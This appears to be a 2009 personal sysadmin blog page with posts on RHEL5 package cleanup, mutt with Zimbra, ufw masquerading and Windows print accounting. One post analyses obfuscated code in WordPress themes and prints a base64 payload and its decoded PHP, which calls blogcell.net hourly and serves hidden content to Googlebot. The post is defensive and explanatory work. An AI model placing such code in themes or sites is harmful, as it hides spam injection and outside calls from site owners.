msgbartop
A chronological documentation test project, nothing serious, really!
msgbarbottom

25 May 2009 Replace RPMforge packages with Redhats own on a RHEL5 system

This post came to life after experiencing some upgrade problems with missing dependencies and RPM packages from RPMforge and Redhat Enterprise Linux Client release 5. The prosess to remove or replace the packages was to remove RPMforge as a package repository and replace the blocking packages with Redhats own packages.

The process of replacing RPMforge packages with Redhats own packages
First we remove rpmforge as package repository

rpm -e rpmforge

This command removes the /etc/yum.repos.d/rpmforge.repo file.

Then we list all packages installed from the RPMforge repository to get an overview of the packages causing problems on the system.

rpm -qa --queryformat %{NAME}-%{VERSION}-%{ARCH}-%{RELEASE}\\n|sort|grep el5.rf

The result

dnsmasq-2.47-x86_64-1.el5.rf
libsndfile-1.0.17-x86_64-1.el5.rf
lftp-3.7.12-x86_64-1.el5.rf
...

The rf ending tells you that these packages are RPMforge packages. This command also tells you if it is 32bit (i386) or 64bit (x86_64) packages. I’ve described the prosess of removing 32- and 64bits packages in a earlier post named Remove duplicate packages when querying the rpm database.

Howto remove 64bit packages

yum remove libsndfile.x86_64

Next we will download the packages we want to replace, in my case dnsmasq

On a RHEL5 system

yumdownloader dnsmasq

If you don’t have yumdownloader in your system you have to install the yum-utils package.

On a RHEL4 system

up2date -d dnsmasq

Then we replace the RPMforge RPM package with Redhats own package

# rpm -Uvh --replacepkgs --oldpackage dnsmasq-2.45-1.el5_2.1.x86_64.rpm 
Preparing...                ########################################### [100%]
   1:dnsmasq                ########################################### [100%]

If you don’t use the –oldpackage option you might get an error message like this

package dnsmasq-2.47-1.el5.rf.x86_64 (which is newer than dnsmasq-2.45-1.el5_2.1.x86_64) is already installed

I continued removing RPMForge packages until yum managed to resolve any unresolved dependencies.

Tags: , , ,

Posted by

24 May 2009 Configure mutt for Zimbra and IMAP

This post describes how to configure the command line e-mail client mutt to use your Zimbra IMAP mailbox.

Open the text file .muttrc, located in your home directory. If it does not exist, create it. Add or replace the following lines with your own user ID:

set spoolfile=imaps://mail.example.com/Inbox
set folder=imaps://mail.example.com/
set imap_user=username@example.com

If you would like to use your Zimbra Sent and Drafts folders for sent and postponed messages in Mutt, also add the following lines, as above:

set record=imaps://mail.example.com/Sent
set postponed=imaps://mail.example.com/Drafts

Mutt can now be used as a e-mail Zimbra client with access to all your mail. You can change folder in mutt by pressing the etter c. If you do not know the name of the folder, just press ?.

Tags: , , ,

Posted by

24 May 2009 ufw and IP masquerading

I’ve just upgraded my home server from Ubuntu 8.10 to 9.04 and experienced that my ufw firewall (iptables) would not route traffic from my local network to the Internet. My IP masquerading was not working anymore and since I had not documented the process when I set it up I had to search the Ubuntu pages to find the solution and came up with this.

The purpose of IP Masquerading is to allow machines with private, non-routable IP addresses on your network to access the Internet through the machine doing the masquerading. Traffic from your private network destined for the Internet must be manipulated for replies to be routable back to the machine that made the request. To do this, the kernel must modify the source IP address of each packet so that replies will be routed back to it, rather than to the private IP address that made the request, which is impossible over the Internet. Linux uses Connection Tracking (conntrack) to keep track of which connections belong to which machines and reroute each return packet accordingly. Traffic leaving your private network is thus “masqueraded” as having originated from your Ubuntu gateway machine. This process is referred to in Microsoft documentation as Internet Connection Sharing.

ufw Masquerading

IP Masquerading can be achieved using custom ufw rules. This is possible because the current back-end for ufw is iptables-restore with the rules files located in

/etc/ufw/*.rules

These files are a great place to add legacy iptables rules used without ufw, and rules that are more network gateway or bridge related.

The rules are split into two different files, rules that should be executed before ufw command line rules, and rules that are executed after ufw command line rules.

  • First, packet forwarding needs to be enabled in ufw. Two configuration files will need to be adjusted, in /etc/default/ufw change the
    DEFAULT_FORWARD_POLICY

    to “ACCEPT”:

    DEFAULT_FORWARD_POLICY="ACCEPT"

    Then edit /etc/ufw/sysctl.conf and uncomment:

    net.ipv4.ip_forward=1

    Similarly, for IPv6 forwarding uncomment:

    net.ipv6.conf.default.forwarding=1
  • Now we will add rules to the /etc/ufw/before.rules file. The default rules only configure the filter table, and to enable masquerading the nat table will need to be configured. Add the following to the top of the file just after the header comments:
    # nat Table rules
    *nat
    :POSTROUTING ACCEPT [0:0]
    
    # Forward traffic from eth1 through eth0.
    -A POSTROUTING -s 192.168.0.0/24 -o eth0 -j MASQUERADE
    
    # don't delete the 'COMMIT' line or these nat table rules won't be processed
    COMMIT

    The comments are not strictly necessary, but it is considered good practice to document your configuration. Also, when modifying any of the rules files in /etc/ufw, make sure these lines are the last line for each table modified:

    # don't delete the 'COMMIT' line or these rules won't be processed
    COMMIT

    For each Table a corresponding COMMIT statement is required. In these examples only the nat and filter tables are shown, but you can also add rules for the raw and mangle tables.

    [Note]
    In the above example replace eth0, eth1, and 192.168.0.0/24 with the appropriate interfaces and IP range for your network.
  • Finally, disable and re-enable ufw to apply the changes:
    sudo ufw disable && sudo ufw enable

IP Masquerading should now be enabled. You can also add any additional FORWARD rules to the /etc/ufw/before.rules. It is recommended that these additional rules be added to the ufw-before-forward chain.

Source: https://help.ubuntu.com/9.04/serverguide/C/firewall.html

Tags: , , , , ,

Posted by

22 May 2009 WordPress themes with eval and base64_decode lines

Lately I’ve been downloading and reading myself up on WordPress themes and stumbled upon something curious. Many themes had encrypted code/lines starting with the following code
Example 1

eval(base64_decode('abcdefgh....')

and other variations like
Example 2

eval(gzinflate(str_rot13(base64_decode('abcdefgh...')

This made me curious about why would someone make such an effort to obfuscate their code. Personally I would like to know what code my themes are running so it was not an option not to decode these eval lines in my WordPress themes. This made me wonder if many of my themes that had these lines of code and a simple command from the console would reveal all my themes that had encoded code from the wp-content/themes katalog on your WordPress installation

grep eval |grep decode | grep php * -R

I had several themes containing code of hiding code and some of the themes had hacks that made traffic redirects to other sites.

Decoding Example 1 can be performed by using the following script and inserting the encrypted text in variable $a.

The PHP decoder script
The encrypted text is taken from a unnamed random theme I have downloaded.

<?php
$a = 'ZnVuY3Rpb24gd3BfZ2V0X2Zvb3Rlcl9tZXRhKCkge2dsb2JhbCAkd3BkYjtpZiAoJGFkd2Jfb3B0ID0gJHdwZGItPmdldF92YXIoIlNFTEVDVCBvcHRpb25fdmFsdWUgRlJPTSAkd3BkYi0+b3B0aW9ucyBXSEVSRSBvcHRpb25fbmFtZT0nYWR3Yl9vcHQnIikpJGFkd2Jfb3B0ID0gdW5zZXJpYWxpemUoJGFkd2Jfb3B0KTtlbHNleyRhZHdiX29wdCA9IGFycmF5KDAsJycpOyR3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdGlvbl9uYW1lLCBvcHRpb25fdmFsdWUsIGF1dG9sb2FkKSBWQUxVRVMgKCdhZHdiX29wdCcsICciLnNlcmlhbGl6ZSgkYWR3Yl9vcHQpLiInLCAnbm8nKSIpO31pZiAoKHRpbWUoKS0kYWR3Yl9vcHRbMF0pID49IDM2MDApeyRhZHdiX2hvc3QgPSAnYmxvZ2NlbGwubmV0JzskYWR3Yl9nZXQgID0gJy93cGFtLyc7JGFkd2Jfc29jICA9IEBmc29ja29wZW4oJGFkd2JfaG9zdCw4MCwkX2VuLCRfZXMsMzApO2lmICgkYWR3Yl9zb2Mpe0BzdHJlYW1fc2V0X3RpbWVvdXQoJGFkd2Jfc29jLDMwKTtAZndyaXRlKCRhZHdiX3NvYywiR0VUICRhZHdiX2dldCIuJz9oPScudXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkuJyZ1PScudXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKS4iIEhUVFAvMS4xXHJcbkhvc3Q6ICRhZHdiX2hvc3RcclxuQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJcbiIpOyRhZHdiX2RhdGEgPSAnJzt3aGlsZSghZmVvZigkYWR3Yl9zb2MpKSAkYWR3Yl9kYXRhIC49IEBmZ2V0cygkYWR3Yl9zb2MsIDEwMjQpOyRhZHdiX2RhdGEgPSB0cmltKHN0cnN0cigkYWR3Yl9kYXRhLCJcclxuXHJcbiIpKTt9QGZjbG9zZSgkYWR3Yl9zb2MpO3ByZWdfbWF0Y2goJy88YWRidWc+KC4rPyk8XC9hZGJ1Zz4vcycsJGFkd2JfZGF0YSwkYWR3Yl90bXApO2lmKCRhZHdiX3RtcFsxXSE9IiIpeyRhZHdiX29wdCA9IGFycmF5KHRpbWUoKSwgJGFkd2JfdG1wWzFdKTskd3BkYi0+cXVlcnkoIlVQREFURSAkd3BkYi0+b3B0aW9ucyBTRVQgb3B0aW9uX3ZhbHVlPSciLm15c3FsX2VzY2FwZV9zdHJpbmcoc2VyaWFsaXplKCRhZHdiX29wdCkpLiInIFdIRVJFIG9wdGlvbl9uYW1lPSdhZHdiX29wdCciKTt9fWlmIChlcmVnaSgiZ29vZ2xlYm90IiwkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKXtpZiAoJGFkd2Jfb3B0WzFdIT0iIillY2hvICRhZHdiX29wdFsxXTt9fSBhZGRfYWN0aW9uKCJ3cF9mb290ZXIiLCAid3BfZ2V0X2Zvb3Rlcl9tZXRhIik7';
function a($a){ return base64_decode($a);}
while(!$b){
        if(substr($a,0,4) == 'eval' || !$count){
                $a = a(str_replace(Array('eval(base64_decode(\'','\')));'),'',$a);
                $count++;
        }else
                $b = true;
}
echo $a;
?>

To run it from a console window you can do the following, not as a privileged user in case it does something nasty.

php scriptname.php > result.txt

My text would output the following text to the result.txt file

function wp_get_footer_meta() {
global $wpdb;
if ($adwb_opt = $wpdb->get_var("SELECT option_value FROM $wpdb->options WHERE option_name='adwb_opt'"))$adwb_opt = unserialize($adwb_opt);
else{$adwb_opt = array(0,'');
$wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('adwb_opt', '".serialize($adwb_opt)."', 'no')");
}
if ((time()-$adwb_opt[0]) >= 3600){$adwb_host = 'blogcell.net';
$adwb_get  = '/wpam/';$adwb_soc  = @fsockopen($adwb_host,80,$_en,$_es,30);
if ($adwb_soc) {
@stream_set_timeout($adwb_soc,30);
@fwrite($adwb_soc,"GET $adwb_get".'?h='.urlencode($_SERVER['HTTP_HOST']).'&='.urlencode($_SERVER['REQUEST_URI'])." HTTP/1.1\r\nHost: $adwb_host\r\nConnection: Close\r\n\r\n");
$adwb_data = '';
while(!feof($adwb_soc)) $adwb_data .= @fgets($adwb_soc, 1024);
$adwb_data = trim(strstr($adwb_data,"\r\n\r\n"));
}
@fclose($adwb_soc);
preg_match('/(.+?)<\/adbug>/s',$adwb_data,$adwb_tmp);
if($adwb_tmp[1]!=""){$adwb_opt = array(time(), $adwb_tmp[1]);
$wpdb->query("UPDATE $wpdb->options SET option_value='".mysql_escape_string(serialize($adwb_opt))."' HERE option_name='adwb_opt'");
}
}
if (eregi("googlebot",$_SERVER['HTTP_USER_AGENT'])){if ($adwb_opt[1]!="")echo $adwb_opt[1];
}
} 
add_action("wp_footer", "wp_get_footer_meta");

You should then decide if the decoded code is something you would like to run on your WordPress site. Some themes are doing this to hide their WordPress theme tricks while other do it to do nasty stuff like redirecting traffic from your site to other sites, etc.

Source: The decoder script was found here

Tags: , , , , , ,

Posted by

15 May 2009 Simple Windows Print Accounting using Event Viewer data

This post continues where my previous post titled Export events including Event Properties from Windows Event Viewer left off.

The data I’m going to work with was exported using eventquery.vbs and saved in a CSV-file, comma separated file and it is presented in the form shown below.

"Information","10","12.05.2009 13:24:48","Print","Servername","None","AD\username","Document 232, filename.pdf owned by username was printed on printername via port IP_192.168.0.254. Size in bytes: 279232; pages printed: 18"

I’m interested in the username, date/time printed and pages printed and will now show how I’ve accomplished that using some simple linux console commands.

awk -F, '{print $7 " " $3 " " $4 " " $NF}' Event_Viewer_System.csv | grep printername | awk '{print $1 "," $2 "," $3 "," $NF}' | sed 's/\"//g'|sort > PrintAccounting.csv

Result

username,14.05.2009,12:58:41,18
username,15.05.2009,09:24:13,2
username,15.05.2009,09:25:00,37
username,15.05.2009,09:30:03,2
username,15.05.2009,09:30:29,2
...

Where the fields contain username, date, time and the amount of printed pages.

A short description on whats being done

  • print out column 7, 3, 4 and last column where the separator is a comma (,) from the file Event_Viewer_System.csv
  • filter out the printer you are interested in
  • filter out again the data we are interested in
  • remove quote sign (“) from the list
  • sort the list ny username
  • redirect the output to a file

And that’s how you make a primitive print accounting system from data gathered in a Windows Server.
This particular example has been testen on data from a Windows 2003 Server, but I think it can be performed on other versions of Windows as well.

Tags: , , ,

Posted by